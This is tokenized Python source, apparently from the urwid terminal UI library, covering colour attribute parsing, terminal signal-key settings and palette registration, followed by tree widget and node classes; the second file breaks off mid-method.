LIGHT_GREEN , <EOL> YELLOW , <EOL> LIGHT_BLUE , <EOL> LIGHT_MAGENTA , <EOL> LIGHT_CYAN , <EOL> WHITE , <EOL> ] <EOL> _ATTRIBUTES = { <EOL> '<STR_LIT>' : _BOLD , <EOL> '<STR_LIT>' : _UNDERLINE , <EOL> '<STR_LIT>' : _BLINK , <EOL> '<STR_LIT>' : _STANDOUT , <EOL> } <EOL> def _value_lookup_table ( values , size ) : <EOL> """<STR_LIT>""" <EOL> middle_values = [ <NUM_LIT:0> ] + [ ( values [ i ] + values [ i + <NUM_LIT:1> ] + <NUM_LIT:1> ) // <NUM_LIT:2> <EOL> for i in range ( len ( values ) - <NUM_LIT:1> ) ] + [ size ] <EOL> lookup_table = [ ] <EOL> for i in range ( len ( middle_values ) - <NUM_LIT:1> ) : <EOL> count = middle_values [ i + <NUM_LIT:1> ] - middle_values [ i ] <EOL> lookup_table . extend ( [ i ] * count ) <EOL> return lookup_table <EOL> _CUBE_256_LOOKUP = _value_lookup_table ( _CUBE_STEPS_256 , <NUM_LIT> ) <EOL> _GRAY_256_LOOKUP = _value_lookup_table ( [ <NUM_LIT:0> ] + _GRAY_STEPS_256 + [ <NUM_LIT> ] , <NUM_LIT> ) <EOL> _CUBE_88_LOOKUP = _value_lookup_table ( _CUBE_STEPS_88 , <NUM_LIT> ) <EOL> _GRAY_88_LOOKUP = _value_lookup_table ( [ <NUM_LIT:0> ] + _GRAY_STEPS_88 + [ <NUM_LIT> ] , <NUM_LIT> ) <EOL> _CUBE_STEPS_256_16 = [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) for n in _CUBE_STEPS_256 ] <EOL> _GRAY_STEPS_256_101 = [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) for n in _GRAY_STEPS_256 ] <EOL> _CUBE_STEPS_88_16 = [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) for n in _CUBE_STEPS_88 ] <EOL> _GRAY_STEPS_88_101 = [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) for n in _GRAY_STEPS_88 ] <EOL> _CUBE_256_LOOKUP_16 = [ _CUBE_256_LOOKUP [ int_scale ( n , <NUM_LIT:16> , <NUM_LIT> ) ] <EOL> for n in range ( <NUM_LIT:16> ) ] <EOL> _GRAY_256_LOOKUP_101 = [ _GRAY_256_LOOKUP [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) ] <EOL> for n in range ( <NUM_LIT> ) ] <EOL> _CUBE_88_LOOKUP_16 = [ _CUBE_88_LOOKUP [ int_scale ( n , <NUM_LIT:16> , <NUM_LIT> ) ] <EOL> for n in range ( <NUM_LIT:16> ) ] <EOL> _GRAY_88_LOOKUP_101 = [ _GRAY_88_LOOKUP [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) ] <EOL> for n in range ( <NUM_LIT> ) ] <EOL> def _gray_num_256 ( gnum ) : <EOL> """<STR_LIT>""" <EOL> gnum -= <NUM_LIT:1> <EOL> if gnum < <NUM_LIT:0> : <EOL> return _CUBE_BLACK <EOL> if gnum >= _GRAY_SIZE_256 : <EOL> return _CUBE_WHITE_256 <EOL> return _GRAY_START_256 + gnum <EOL> def _gray_num_88 ( gnum ) : <EOL> """<STR_LIT>""" <EOL> gnum -= <NUM_LIT:1> <EOL> if gnum < <NUM_LIT:0> : <EOL> return _CUBE_BLACK <EOL> if gnum >= _GRAY_SIZE_88 : <EOL> return _CUBE_WHITE_88 <EOL> return _GRAY_START_88 + gnum <EOL> def _color_desc_256 ( num ) : <EOL> """<STR_LIT>""" <EOL> assert num >= <NUM_LIT:0> and num < <NUM_LIT> , num <EOL> if num < _CUBE_START : <EOL> return '<STR_LIT>' % num <EOL> if num < _GRAY_START_256 : <EOL> num -= _CUBE_START <EOL> b , num = num % _CUBE_SIZE_256 , num // _CUBE_SIZE_256 <EOL> g , num = num % _CUBE_SIZE_256 , num // _CUBE_SIZE_256 <EOL> r = num % _CUBE_SIZE_256 <EOL> return '<STR_LIT>' % ( _CUBE_STEPS_256_16 [ r ] , _CUBE_STEPS_256_16 [ g ] , <EOL> _CUBE_STEPS_256_16 [ b ] ) <EOL> return '<STR_LIT>' % _GRAY_STEPS_256_101 [ num - _GRAY_START_256 ] <EOL> def _color_desc_88 ( num ) : <EOL> """<STR_LIT>""" <EOL> assert num > <NUM_LIT:0> and num < <NUM_LIT> <EOL> if num < _CUBE_START : <EOL> return '<STR_LIT>' % num <EOL> if num < _GRAY_START_88 : <EOL> num -= _CUBE_START <EOL> b , num = num % _CUBE_SIZE_88 , num // _CUBE_SIZE_88 <EOL> g , r = num % _CUBE_SIZE_88 , num // _CUBE_SIZE_88 <EOL> return '<STR_LIT>' % ( _CUBE_STEPS_88_16 [ r ] , _CUBE_STEPS_88_16 [ g ] , <EOL> _CUBE_STEPS_88_16 [ b ] ) <EOL> return '<STR_LIT>' % _GRAY_STEPS_88_101 [ num - _GRAY_START_88 ] <EOL> def _parse_color_256 ( desc ) : <EOL> """<STR_LIT>""" <EOL> if len ( desc ) > <NUM_LIT:4> : <EOL> return None <EOL> try : <EOL> if desc . startswith ( '<STR_LIT:h>' ) : <EOL> num = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> if num < <NUM_LIT:0> or num > <NUM_LIT:255> : <EOL> return None <EOL> return num <EOL> if desc . startswith ( '<STR_LIT:#>' ) and len ( desc ) == <NUM_LIT:4> : <EOL> rgb = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:16> ) <EOL> if rgb < <NUM_LIT:0> : <EOL> return None <EOL> b , rgb = rgb % <NUM_LIT:16> , rgb // <NUM_LIT:16> <EOL> g , r = rgb % <NUM_LIT:16> , rgb // <NUM_LIT:16> <EOL> r = _CUBE_256_LOOKUP_16 [ r ] <EOL> g = _CUBE_256_LOOKUP_16 [ g ] <EOL> b = _CUBE_256_LOOKUP_16 [ b ] <EOL> return _CUBE_START + ( r * _CUBE_SIZE_256 + g ) * _CUBE_SIZE_256 + b <EOL> if desc . startswith ( '<STR_LIT>' ) : <EOL> gray = int ( desc [ <NUM_LIT:2> : ] , <NUM_LIT:16> ) <EOL> if gray < <NUM_LIT:0> or gray > <NUM_LIT:255> : <EOL> return None <EOL> gray = _GRAY_256_LOOKUP [ gray ] <EOL> elif desc . startswith ( '<STR_LIT:g>' ) : <EOL> gray = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> if gray < <NUM_LIT:0> or gray > <NUM_LIT:100> : <EOL> return None <EOL> gray = _GRAY_256_LOOKUP_101 [ gray ] <EOL> else : <EOL> return None <EOL> if gray == <NUM_LIT:0> : <EOL> return _CUBE_BLACK <EOL> gray -= <NUM_LIT:1> <EOL> if gray == _GRAY_SIZE_256 : <EOL> return _CUBE_WHITE_256 <EOL> return _GRAY_START_256 + gray <EOL> except ValueError : <EOL> return None <EOL> def _parse_color_88 ( desc ) : <EOL> """<STR_LIT>""" <EOL> if len ( desc ) > <NUM_LIT:4> : <EOL> return None <EOL> try : <EOL> if desc . startswith ( '<STR_LIT:h>' ) : <EOL> num = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> if num < <NUM_LIT:0> or num > <NUM_LIT> : <EOL> return None <EOL> return num <EOL> if desc . startswith ( '<STR_LIT:#>' ) and len ( desc ) == <NUM_LIT:4> : <EOL> rgb = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:16> ) <EOL> if rgb < <NUM_LIT:0> : <EOL> return None <EOL> b , rgb = rgb % <NUM_LIT:16> , rgb // <NUM_LIT:16> <EOL> g , r = rgb % <NUM_LIT:16> , rgb // <NUM_LIT:16> <EOL> r = _CUBE_88_LOOKUP_16 [ r ] <EOL> g = _CUBE_88_LOOKUP_16 [ g ] <EOL> b = _CUBE_88_LOOKUP_16 [ b ] <EOL> return _CUBE_START + ( r * _CUBE_SIZE_88 + g ) * _CUBE_SIZE_88 + b <EOL> if desc . startswith ( '<STR_LIT>' ) : <EOL> gray = int ( desc [ <NUM_LIT:2> : ] , <NUM_LIT:16> ) <EOL> if gray < <NUM_LIT:0> or gray > <NUM_LIT:255> : <EOL> return None <EOL> gray = _GRAY_88_LOOKUP [ gray ] <EOL> elif desc . startswith ( '<STR_LIT:g>' ) : <EOL> gray = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> if gray < <NUM_LIT:0> or gray > <NUM_LIT:100> : <EOL> return None <EOL> gray = _GRAY_88_LOOKUP_101 [ gray ] <EOL> else : <EOL> return None <EOL> if gray == <NUM_LIT:0> : <EOL> return _CUBE_BLACK <EOL> gray -= <NUM_LIT:1> <EOL> if gray == _GRAY_SIZE_88 : <EOL> return _CUBE_WHITE_88 <EOL> return _GRAY_START_88 + gray <EOL> except ValueError : <EOL> return None <EOL> class AttrSpecError ( Exception ) : <EOL> pass <EOL> class AttrSpec ( object ) : <EOL> def __init__ ( self , fg , bg , colors = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if colors not in ( <NUM_LIT:1> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> ) : <EOL> raise AttrSpecError ( '<STR_LIT>' % colors ) <EOL> self . _value = <NUM_LIT:0> | _HIGH_88_COLOR * ( colors == <NUM_LIT> ) <EOL> self . foreground = fg <EOL> self . background = bg <EOL> if self . colors > colors : <EOL> raise AttrSpecError ( ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) % <EOL> ( repr ( fg ) , repr ( bg ) , colors ) ) <EOL> foreground_basic = property ( lambda s : s . _value & _FG_BASIC_COLOR != <NUM_LIT:0> ) <EOL> foreground_high = property ( lambda s : s . _value & _FG_HIGH_COLOR != <NUM_LIT:0> ) <EOL> foreground_number = property ( lambda s : s . _value & _FG_COLOR_MASK ) <EOL> background_basic = property ( lambda s : s . _value & _BG_BASIC_COLOR != <NUM_LIT:0> ) <EOL> background_high = property ( lambda s : s . _value & _BG_HIGH_COLOR != <NUM_LIT:0> ) <EOL> background_number = property ( lambda s : ( s . _value & _BG_COLOR_MASK ) <EOL> >> _BG_SHIFT ) <EOL> bold = property ( lambda s : s . _value & _BOLD != <NUM_LIT:0> ) <EOL> underline = property ( lambda s : s . _value & _UNDERLINE != <NUM_LIT:0> ) <EOL> blink = property ( lambda s : s . _value & _BLINK != <NUM_LIT:0> ) <EOL> standout = property ( lambda s : s . _value & _STANDOUT != <NUM_LIT:0> ) <EOL> def _colors ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _value & _HIGH_88_COLOR : <EOL> return <NUM_LIT> <EOL> if self . _value & ( _BG_HIGH_COLOR | _FG_HIGH_COLOR ) : <EOL> return <NUM_LIT> <EOL> if self . _value & ( _BG_BASIC_COLOR | _BG_BASIC_COLOR ) : <EOL> return <NUM_LIT:16> <EOL> return <NUM_LIT:1> <EOL> colors = property ( _colors ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> args = "<STR_LIT>" % ( self . foreground , self . background ) <EOL> if self . colors == <NUM_LIT> : <EOL> args = args + "<STR_LIT>" <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , args ) <EOL> def _foreground_color ( self ) : <EOL> """<STR_LIT>""" <EOL> if not ( self . foreground_basic or self . foreground_high ) : <EOL> return '<STR_LIT:default>' <EOL> if self . foreground_basic : <EOL> return _BASIC_COLORS [ self . foreground_number ] <EOL> if self . colors == <NUM_LIT> : <EOL> return _color_desc_88 ( self . foreground_number ) <EOL> return _color_desc_256 ( self . foreground_number ) <EOL> def _foreground ( self ) : <EOL> return ( self . _foreground_color ( ) + <EOL> '<STR_LIT>' * self . bold + '<STR_LIT>' * self . standout + <EOL> '<STR_LIT>' * self . blink + '<STR_LIT>' * self . underline ) <EOL> def _set_foreground ( self , foreground ) : <EOL> color = None <EOL> flags = <NUM_LIT:0> <EOL> for part in foreground . split ( '<STR_LIT:U+002C>' ) : <EOL> part = part . strip ( ) <EOL> if part in _ATTRIBUTES : <EOL> if flags & _ATTRIBUTES [ part ] : <EOL> raise AttrSpecError ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % ( repr ( part ) , <EOL> repr ( foreground ) ) ) <EOL> flags |= _ATTRIBUTES [ part ] <EOL> continue <EOL> if part in ( '<STR_LIT>' , '<STR_LIT:default>' ) : <EOL> scolor = <NUM_LIT:0> <EOL> elif part in _BASIC_COLORS : <EOL> scolor = _BASIC_COLORS . index ( part ) <EOL> flags |= _FG_BASIC_COLOR <EOL> elif self . _value & _HIGH_88_COLOR : <EOL> scolor = _parse_color_88 ( part ) <EOL> flags |= _FG_HIGH_COLOR <EOL> else : <EOL> scolor = _parse_color_256 ( part ) <EOL> flags |= _FG_HIGH_COLOR <EOL> if scolor is None : <EOL> raise AttrSpecError ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % ( repr ( part ) , repr ( foreground ) ) ) <EOL> if color is not None : <EOL> raise AttrSpecError ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % ( repr ( foreground ) , ) ) <EOL> color = scolor <EOL> if color is None : <EOL> color = <NUM_LIT:0> <EOL> self . _value = ( self . _value & ~ _FG_MASK ) | color | flags <EOL> foreground = property ( _foreground , _set_foreground ) <EOL> def _background ( self ) : <EOL> """<STR_LIT>""" <EOL> if not ( self . background_basic or self . background_high ) : <EOL> return '<STR_LIT:default>' <EOL> if self . background_basic : <EOL> return _BASIC_COLORS [ self . background_number ] <EOL> if self . _value & _HIGH_88_COLOR : <EOL> return _color_desc_88 ( self . background_number ) <EOL> return _color_desc_256 ( self . background_number ) <EOL> def _set_background ( self , background ) : <EOL> flags = <NUM_LIT:0> <EOL> if background in ( '<STR_LIT>' , '<STR_LIT:default>' ) : <EOL> color = <NUM_LIT:0> <EOL> elif background in _BASIC_COLORS : <EOL> color = _BASIC_COLORS . index ( background ) <EOL> flags |= _BG_BASIC_COLOR <EOL> elif self . _value & _HIGH_88_COLOR : <EOL> color = _parse_color_88 ( background ) <EOL> flags |= _BG_HIGH_COLOR <EOL> else : <EOL> color = _parse_color_256 ( background ) <EOL> flags |= _BG_HIGH_COLOR <EOL> if color is None : <EOL> raise AttrSpecError ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % ( repr ( background ) , ) ) <EOL> self . _value = ( self . _value & ~ _BG_MASK ) | ( color << _BG_SHIFT ) | flags <EOL> background = property ( _background , _set_background ) <EOL> def get_rgb_values ( self ) : <EOL> """<STR_LIT>""" <EOL> if not ( self . foreground_basic or self . foreground_high ) : <EOL> vals = ( None , None , None ) <EOL> elif self . colors == <NUM_LIT> : <EOL> assert self . foreground_number < <NUM_LIT> , "<STR_LIT>" <EOL> vals = _COLOR_VALUES_88 [ self . foreground_number ] <EOL> else : <EOL> vals = _COLOR_VALUES_256 [ self . foreground_number ] <EOL> if not ( self . background_basic or self . background_high ) : <EOL> return vals + ( None , None , None ) <EOL> elif self . colors == <NUM_LIT> : <EOL> assert self . background_number < <NUM_LIT> , "<STR_LIT>" <EOL> return vals + _COLOR_VALUES_88 [ self . background_number ] <EOL> else : <EOL> return vals + _COLOR_VALUES_256 [ self . background_number ] <EOL> class RealTerminal ( object ) : <EOL> def __init__ ( self ) : <EOL> super ( RealTerminal , self ) . __init__ ( ) <EOL> self . _signal_keys_set = False <EOL> self . _old_signal_keys = None <EOL> def tty_signal_keys ( self , intr = None , quit = None , start = None , <EOL> stop = None , susp = None , fileno = None ) : <EOL> """<STR_LIT>""" <EOL> if fileno is None : <EOL> fileno = sys . stdin . fileno ( ) <EOL> if not os . isatty ( fileno ) : <EOL> return <EOL> tattr = termios . tcgetattr ( fileno ) <EOL> sattr = tattr [ <NUM_LIT:6> ] <EOL> skeys = ( sattr [ termios . VINTR ] , sattr [ termios . VQUIT ] , <EOL> sattr [ termios . VSTART ] , sattr [ termios . VSTOP ] , <EOL> sattr [ termios . VSUSP ] ) <EOL> if intr == '<STR_LIT>' : intr = <NUM_LIT:0> <EOL> if quit == '<STR_LIT>' : quit = <NUM_LIT:0> <EOL> if start == '<STR_LIT>' : start = <NUM_LIT:0> <EOL> if stop == '<STR_LIT>' : stop = <NUM_LIT:0> <EOL> if susp == '<STR_LIT>' : susp = <NUM_LIT:0> <EOL> if intr is not None : tattr [ <NUM_LIT:6> ] [ termios . VINTR ] = intr <EOL> if quit is not None : tattr [ <NUM_LIT:6> ] [ termios . VQUIT ] = quit <EOL> if start is not None : tattr [ <NUM_LIT:6> ] [ termios . VSTART ] = start <EOL> if stop is not None : tattr [ <NUM_LIT:6> ] [ termios . VSTOP ] = stop <EOL> if susp is not None : tattr [ <NUM_LIT:6> ] [ termios . VSUSP ] = susp <EOL> if intr is not None or quit is not None or start is not None or stop is not None or susp is not None : <EOL> termios . tcsetattr ( fileno , termios . TCSADRAIN , tattr ) <EOL> self . _signal_keys_set = True <EOL> return skeys <EOL> class ScreenError ( Exception ) : <EOL> pass <EOL> class BaseScreen ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = signals . MetaSignals <EOL> signals = [ UPDATE_PALETTE_ENTRY , INPUT_DESCRIPTORS_CHANGED ] <EOL> def __init__ ( self ) : <EOL> super ( BaseScreen , self ) . __init__ ( ) <EOL> self . _palette = { } <EOL> self . _started = False <EOL> started = property ( lambda self : self . _started ) <EOL> def start ( self ) : <EOL> self . _started = True <EOL> def stop ( self ) : <EOL> self . _started = False <EOL> def register_palette ( self , palette ) : <EOL> """<STR_LIT>""" <EOL> for item in palette : <EOL> if len ( item ) in ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:6> ) : <EOL> self . register_palette_entry ( * item ) <EOL> continue <EOL> if len ( item ) != <NUM_LIT:2> : <EOL> raise ScreenError ( "<STR_LIT>" % <EOL> repr ( item ) ) <EOL> name , like_name = item <EOL> if not self . _palette . has_key ( like_name ) : <EOL> raise ScreenError ( "<STR_LIT>" % like_name ) <EOL> self . _palette [ name ] = self . _palette [ like_name ] <EOL> def register_palette_entry ( self , name , foreground , background , <EOL> mono = None , foreground_high = None , background_high = None ) : <EOL> """<STR_LIT>""" <EOL> basic = AttrSpec ( foreground , background , <NUM_LIT:16> ) <EOL> if type ( mono ) == tuple : <EOL> mono = "<STR_LIT:U+002C>" . join ( mono ) <EOL> if mono is None : <EOL> mono = DEFAULT <EOL> mono = AttrSpec ( mono , DEFAULT , <NUM_LIT:1> ) <EOL> if foreground_high is None : <EOL> foreground_high = foreground <EOL> if background_high is None : <EOL> background_high = background <EOL> high_256 = AttrSpec ( foreground_high , background_high , <NUM_LIT> ) <EOL> def large_h ( desc ) : <EOL> if not desc . startswith ( '<STR_LIT:h>' ) : <EOL> return False <EOL> num = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> return num > <NUM_LIT:15> <EOL> if large_h ( foreground_high ) or large_h ( background_high ) : <EOL> high_88 = basic <EOL> else : <EOL> high_88 = AttrSpec ( foreground_high , background_high , <NUM_LIT> ) <EOL> signals . emit_signal ( self , UPDATE_PALETTE_ENTRY , <EOL> name , basic , mono , high_88 , high_256 ) <EOL> self . _palette [ name ] = ( basic , mono , high_88 , high_256 ) <EOL> def _test ( ) : <EOL> import doctest <EOL> doctest . testmod ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) </s>
<s> """<STR_LIT>""" <EOL> import urwid <EOL> from urwid . wimp import SelectableIcon <EOL> class TreeWidgetError ( RuntimeError ) : <EOL> pass <EOL> class TreeWidget ( urwid . WidgetWrap ) : <EOL> """<STR_LIT>""" <EOL> indent_cols = <NUM_LIT:3> <EOL> unexpanded_icon = SelectableIcon ( '<STR_LIT:+>' , <NUM_LIT:0> ) <EOL> expanded_icon = SelectableIcon ( '<STR_LIT:->' , <NUM_LIT:0> ) <EOL> def __init__ ( self , node ) : <EOL> self . _node = node <EOL> self . _innerwidget = None <EOL> self . is_leaf = not hasattr ( node , '<STR_LIT>' ) <EOL> self . expanded = True <EOL> widget = self . get_indented_widget ( ) <EOL> self . __super . __init__ ( widget ) <EOL> def selectable ( self ) : <EOL> """<STR_LIT>""" <EOL> return not self . is_leaf <EOL> def get_indented_widget ( self ) : <EOL> widget = self . get_inner_widget ( ) <EOL> if not self . is_leaf : <EOL> widget = urwid . Columns ( [ ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> [ self . unexpanded_icon , self . expanded_icon ] [ self . expanded ] ) , <EOL> widget ] , dividechars = <NUM_LIT:1> ) <EOL> indent_cols = self . get_indent_cols ( ) <EOL> return urwid . Padding ( widget , <EOL> width = ( '<STR_LIT>' , <NUM_LIT:100> ) , left = indent_cols ) <EOL> def update_expanded_icon ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _w . base_widget . widget_list [ <NUM_LIT:0> ] = [ <EOL> self . unexpanded_icon , self . expanded_icon ] [ self . expanded ] <EOL> def get_indent_cols ( self ) : <EOL> return self . indent_cols * self . get_node ( ) . get_depth ( ) <EOL> def get_inner_widget ( self ) : <EOL> if self . _innerwidget is None : <EOL> self . _innerwidget = self . load_inner_widget ( ) <EOL> return self . _innerwidget <EOL> def load_inner_widget ( self ) : <EOL> return urwid . Text ( self . get_display_text ( ) ) <EOL> def get_node ( self ) : <EOL> return self . _node <EOL> def get_display_text ( self ) : <EOL> return ( self . get_node ( ) . get_key ( ) + "<STR_LIT>" + <EOL> str ( self . get_node ( ) . get_value ( ) ) ) <EOL> def next_inorder ( self ) : <EOL> """<STR_LIT>""" <EOL> firstchild = self . first_child ( ) <EOL> if firstchild is not None : <EOL> return firstchild <EOL> thisnode = self . get_node ( ) <EOL> nextnode = thisnode . next_sibling ( ) <EOL> depth = thisnode . get_depth ( ) <EOL> while nextnode is None and depth > <NUM_LIT:0> : <EOL> thisnode = thisnode . get_parent ( ) <EOL> nextnode = thisnode . next_sibling ( ) <EOL> depth -= <NUM_LIT:1> <EOL> assert depth == thisnode . get_depth ( ) <EOL> if nextnode is None : <EOL> return None <EOL> else : <EOL> return nextnode . get_widget ( ) <EOL> def prev_inorder ( self ) : <EOL> """<STR_LIT>""" <EOL> thisnode = self . _node <EOL> prevnode = thisnode . prev_sibling ( ) <EOL> if prevnode is not None : <EOL> prevwidget = prevnode . get_widget ( ) <EOL> lastchild = prevwidget . last_child ( ) <EOL> if lastchild is None : <EOL> return prevwidget <EOL> else : <EOL> return lastchild <EOL> else : <EOL> depth = thisnode . get_depth ( ) <EOL> if prevnode is None and depth == <NUM_LIT:0> : <EOL> return None <EOL> elif prevnode is None : <EOL> prevnode = thisnode . get_parent ( ) <EOL> return prevnode . get_widget ( ) <EOL> def keypress ( self , size , key ) : <EOL> """<STR_LIT>""" <EOL> if self . is_leaf : <EOL> return key <EOL> if key in ( "<STR_LIT:+>" , "<STR_LIT:right>" ) : <EOL> self . expanded = True <EOL> self . update_expanded_icon ( ) <EOL> elif key == "<STR_LIT:->" : <EOL> self . expanded = False <EOL> self . update_expanded_icon ( ) <EOL> elif self . _w . selectable ( ) : <EOL> return self . __super . keypress ( size , key ) <EOL> else : <EOL> return key <EOL> def mouse_event ( self , size , event , button , col , row , focus ) : <EOL> if self . is_leaf or event != '<STR_LIT>' or button != <NUM_LIT:1> : <EOL> return False <EOL> if row == <NUM_LIT:0> and col == self . get_indent_cols ( ) : <EOL> self . expanded = not self . expanded <EOL> self . update_expanded_icon ( ) <EOL> return True <EOL> return False <EOL> def first_child ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_leaf or not self . expanded : <EOL> return None <EOL> else : <EOL> if self . _node . has_children ( ) : <EOL> firstnode = self . _node . get_first_child ( ) <EOL> return firstnode . get_widget ( ) <EOL> else : <EOL> return None <EOL> def last_child ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_leaf or not self . expanded : <EOL> return None <EOL> else : <EOL> if self . _node . has_children ( ) : <EOL> lastchild = self . _node . get_last_child ( ) . get_widget ( ) <EOL> else : <EOL> return None <EOL> lastdescendant = lastchild . last_child ( ) <EOL> if lastdescendant is None : <EOL> return lastchild <EOL> else : <EOL> return lastdescendant <EOL> class TreeNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , parent = None , key = None , depth = None ) : <EOL> self . _key = key <EOL> self . _parent = parent <EOL> self . _value = value <EOL> self . _depth = depth <EOL> self . _widget = None <EOL> def get_widget ( self , reload = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _widget is None or reload == True : <EOL> self . _widget = self . load_widget ( ) <EOL> return self . _widget <EOL> def load_widget ( self ) : <EOL> return TreeWidget ( self ) <EOL> def get_depth ( self ) : <EOL> if self . _depth is None and self . _parent is None : <EOL> self . _depth = <NUM_LIT:0> <EOL> elif self . _depth is None : <EOL> self . _depth = self . _parent . get_depth ( ) + <NUM_LIT:1> <EOL> return self . _depth <EOL> def get_index ( self ) : <EOL> if self . get_depth ( ) == <NUM_LIT:0> : <EOL> return None <EOL> else : <EOL> key = self . get_key ( ) <EOL> parent = self . get_parent ( ) <EOL> return parent . get_child_index ( key ) <EOL> def get_key ( self ) : <EOL> return self . _key <EOL> def set_key ( self , key ) : <EOL> self . _key = key <EOL> def change_key ( self , key ) : <EOL> self . get_parent ( ) . change_child_key ( self . _key , key ) <EOL> def get_parent ( self ) : <EOL> if self . _parent == None and self . get_depth ( ) > <NUM_LIT:0> : <EOL> self . _parent = self . load_parent ( ) <EOL> return self . _parent <EOL> def load_parent ( self ) : <EOL> """<STR_LIT>""" <EOL> raise TreeWidgetError ( "<STR_LIT>" ) <EOL> def get_value ( self ) : <EOL> return self . _value <EOL> def is_root ( self ) : <EOL> return self . get_depth ( ) == <NUM_LIT:0> <EOL> def next_sibling ( self ) : <EOL> if self . get_depth ( ) > <NUM_LIT:0> : <EOL> return self . get_parent ( ) . next_child ( self . get_key ( ) ) <EOL> else : <EOL> return None <EOL> def prev_sibling ( self ) : <EOL> if self . get_depth ( ) > <NUM_LIT:0> : <EOL> return self . get_parent ( ) . prev_child ( self . get_key ( ) ) <EOL> else : <EOL> return None <EOL> def get_root ( self ) : <EOL> root = self <EOL> while root . get_parent ( ) is not None : <EOL> root = root . get_parent ( ) <EOL> return root <EOL> class ParentNode ( TreeNode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , parent = None , key = None , depth = None ) : <EOL> TreeNode . __init__ ( self , value , parent = parent , key = key , depth = depth ) <EOL> self . _child_keys = None <EOL> self . _children = { } <EOL> def get_child_keys ( self , reload = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _child_keys is None or reload == True : <EOL> self . _child_keys = self . load_child_keys ( ) <EOL> return self . _child_keys <EOL> def load_child_keys ( self ) : <EOL> """<STR_LIT>""" <EOL> raise TreeWidgetError ( "<STR_LIT>" ) <EOL> def get_child_widget ( self , key ) : <EOL> """<STR_LIT>""" <EOL> child = self . get_child_node ( key ) <EOL> return child . get_widget ( ) <EOL> def get_child_node ( self , key , reload = False ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . _children or reload == True : <EOL> self . _children [ key ] = self . load_child_node ( key ) <EOL> return self . _children [ key ] <EOL> def load_child_node ( self , key ) : <EOL> """<STR_LIT>""" <EOL> raise TreeWidgetError ( "<STR_LIT>" ) <EOL> def set_child_node ( self , key , node ) : <EOL> """<STR_LIT>""" <EOL> self . _children [ key ] = node <EOL> def change_child_key ( self , oldkey , newkey ) : <EOL> if newkey in self . _children : <EOL> raise TreeWidgetError ( "<STR_LIT>" % newkey ) <EOL> self . _children [ newkey ] = self . _children . pop ( oldkey ) <EOL> self . _children [ newkey ] . set_key ( newkey ) <EOL> def get_child_index ( self , key ) : <EOL> try : <EOL> return self . get_child_keys ( ) . index ( key ) <EOL> except ValueError : <EOL> errorstring = ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> raise TreeWidgetError ( errorstring % ( key , self . get_key ( ) , <EOL> str ( self . get_child_keys ( ) ) ) ) <EOL> def next_child ( self , key ) : <EOL> """<STR_LIT>""" <EOL> index = self . get_child_index ( key ) <EOL> if index is None : <EOL> return None <EOL> index += <NUM_LIT:1> <EOL> child_keys = self . get_child_keys ( ) <EOL> if index < len ( child_keys ) : <EOL> return self . get_child_node ( child_keys [ index ] ) <EOL> else : <EOL> return None <EOL> def prev_child ( self , key ) : <EOL> """<STR_LIT>""" <EOL> index = self . get_child_index ( key ) <EOL> if index is None : <EOL> return None <EOL> child_keys = self . get_child_keys ( ) <EOL> index -= <NUM_LIT:1> <EOL> if index >= <NUM_LIT:0> : <EOL> return self . get_child_node ( child_keys [ index ] ) <EOL> else : <EOL> return None <EOL> def get_first_child ( self ) : <EOL> """<STR_LIT>""" <EOL> child_keys = self . get_child_keys ( ) <EOL> return self . get_child_node ( child_keys [ <NUM_LIT:0> ] ) <EOL> def get_last_child ( self ) : <EOL> """<STR_LIT>""" <EOL> child_keys = self . get_child_keys ( ) <EOL> return self . get_child_node ( child_keys [ - <NUM_LIT:1> ] ) <EOL> def has_children ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . get_child_keys ( ) ) > <NUM_LIT:0> <EOL> class TreeWalker ( urwid . ListWalker ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , start_from ) : <EOL> """<STR_LIT>""" <EOL> self . focus = start_from <EOL> def get_focus ( self ) : <EOL> widget = self . focus . get_widget ( ) <EOL> return widget , self . focus <EOL> def set_focus ( self , focus ) : <EOL> self . focus = focus <EOL> self . _modified ( ) <EOL> def get_next ( self , start_from ) : <EOL> widget = start_from . get_widget ( ) <EOL> target = widget . next_inorder ( ) <EOL> if target is None : <EOL> return None , None <EOL> else : <EOL> return target , target . get_node ( ) <EOL> def get_prev ( self , start_from ) : <EOL> widget = start_from . get_widget ( ) <EOL> target = widget . prev_inorder ( ) <EOL> if target is None : <EOL> return None , None 